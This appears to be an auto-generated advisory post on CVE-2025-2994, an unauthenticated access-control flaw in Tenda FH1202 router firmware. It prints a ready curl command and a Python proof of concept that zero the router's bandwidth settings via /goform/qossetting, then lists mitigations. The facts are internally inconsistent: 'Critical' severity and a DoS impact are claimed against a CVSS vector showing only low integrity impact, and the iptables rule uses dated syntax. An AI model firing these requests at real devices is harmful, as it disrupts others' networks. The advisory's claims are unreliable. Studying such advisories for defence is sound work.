Listen to this Post
How CVE-2025-2994 Works
The vulnerability in Tenda FH1202 firmware v1.2.0.14(408) resides in the `/goform/qossetting` endpoint of the web management interface. Attackers can remotely exploit improper access controls to manipulate QoS settings without authentication. The flaw allows unauthorized requests to bypass authentication checks, enabling attackers to alter network traffic prioritization rules or disrupt service. The CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N) reflects its network-based attack vector and low attack complexity. Public exploit code leverages crafted HTTP POST requests to the vulnerable endpoint.
DailyCVE Form
Platform: Tenda FH1202
Version: 1.2.0.14(408)
Vulnerability: Improper Access Control
Severity: Critical
Date: 04/07/2025
What Undercode Say:
Exploitation
curl -X POST http://<TARGET_IP>/goform/qossetting -d "qosEn=true&upBand=100&downBand=100"
Python PoC:
import requests
target = "http://192.168.1.1/goform/qossetting"
payload = {"qosEn": "true", "upBand": "0", "downBand": "0"}
requests.post(target, data=payload)
Mitigation
1. Patch: Upgrade to firmware version >1.2.0.14(408).
2. Network Controls:
iptables -A INPUT -p tcp --dport 80 -s ! <TRUSTED_IP> -j DROP
3. Log Monitoring:
tail -f /var/log/nginx/access.log | grep "/goform/qossetting"
Analysis
- Impact: Unauthorized QoS manipulation leading to DoS.
- Detection: Check for unexpected POST requests to
/goform/qossetting. - Workaround: Disable web management interface if unused.
References
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-2994
Extra Source Hub:
Undercode

